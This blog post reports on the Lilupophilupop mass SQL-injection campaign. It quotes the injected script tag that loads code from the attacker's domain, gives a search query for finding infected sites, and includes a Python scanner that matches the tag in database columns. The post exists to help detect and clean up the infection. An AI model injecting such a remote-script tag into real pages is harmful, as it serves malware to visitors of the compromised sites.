A month ago the Internet Storm Center (ISC) reported that Lilupophilupop was infecting web pages by injecting a string of code into them. The injected string is: "></title><script src="hXXp://lilupophilupop.com/sl.php"></script> (hXXp is actually http; we replaced it to avoid any issues). If that string was injected into your page, your application has a coding issue; to avoid it you need to validate input, that is, every parameter your application accepts. Now, a month later, about a million pages have been infected by Lilupophilupop through SQL injection. To check whether a domain is infected, search Google for "<script src="http://lilupophilupop.com/" site:the domain you are checking. For example, to check whether this site is infected, use the search "<script src="http://lilupophilupop.com/" site:michalisnicolaides.com.
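The Google search only shows what has been indexed publicly; the same check can be run against the site's own stored content. The following is an added example, not code from the original post or from ISC: it scans every text column of a database for the injected script tag. The SQLite backend, the table names and the sample rows are assumptions constructed for the demonstration.

```python
import re
import sqlite3

# Signature for the injected tag described in the post: a <script> whose src
# points at the lilupophilupop.com host (any path, either quote style).
MARKER = re.compile(
    r"<script[^>]*\bsrc\s*=\s*[\"']?https?://(?:[\w-]+\.)*lilupophilupop\.com\b",
    re.IGNORECASE,
)

def quote_ident(name):
    """Quote a table/column name so it can be interpolated into SQL safely."""
    return '"' + name.replace('"', '""') + '"'

def find_injected_rows(conn):
    """Return sorted (table, column, rowid) for every text cell matching MARKER."""
    hits = []
    tables = [r[0] for r in conn.execute(
        "SELECT name FROM sqlite_master WHERE type='table' AND name NOT LIKE 'sqlite_%'")]
    for table in tables:
        cols = [r[1] for r in conn.execute(f"PRAGMA table_info({quote_ident(table)})")]
        for col in cols:
            query = f"SELECT rowid, {quote_ident(col)} FROM {quote_ident(table)}"
            for rowid, value in conn.execute(query):
                if isinstance(value, str) and MARKER.search(value):
                    hits.append((table, col, rowid))
    return sorted(hits)

def build_sample_db():
    """Constructed sample data: two tables, two cells carrying the injected string."""
    scheme = "hXXp".replace("XX", "tt")  # refanged only for the in-memory sample
    injected = f'"></title><script src="{scheme}://lilupophilupop.com/sl.php"></script>'
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.execute("CREATE TABLE comments (id INTEGER PRIMARY KEY, author TEXT, text TEXT)")
    conn.executemany("INSERT INTO articles (title, body) VALUES (?, ?)", [
        ("Welcome", "Plain text body."),
        ("News" + injected, "Body mentioning lilupophilupop.com in prose only."),
    ])
    conn.executemany("INSERT INTO comments (author, text) VALUES (?, ?)", [
        ("alice", "Nice post"),
        ("bob", "hello" + injected.upper()),
    ])
    return conn

if __name__ == "__main__":
    for table, col, rowid in find_injected_rows(build_sample_db()):
        print(f"{table}.{col} rowid={rowid}")
```

Rows that match still need cleaning after the vulnerable parameter handling is fixed; otherwise the same input will reinfect them.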

Most infected websites belong to the Netherlands (they have a .nl extension), about 123000 of them. In second place are about 68000 .fr sites, followed by 56000 .uk sites. The number of infected pages keeps increasing, mostly because of ignorance on the part of web developers. Sadly, most web developers don't pay attention to the security of the systems and applications they create. This allows attackers to exploit the security holes, with results like these.

Source: [ISC]

Lilupophilupop infected one million pages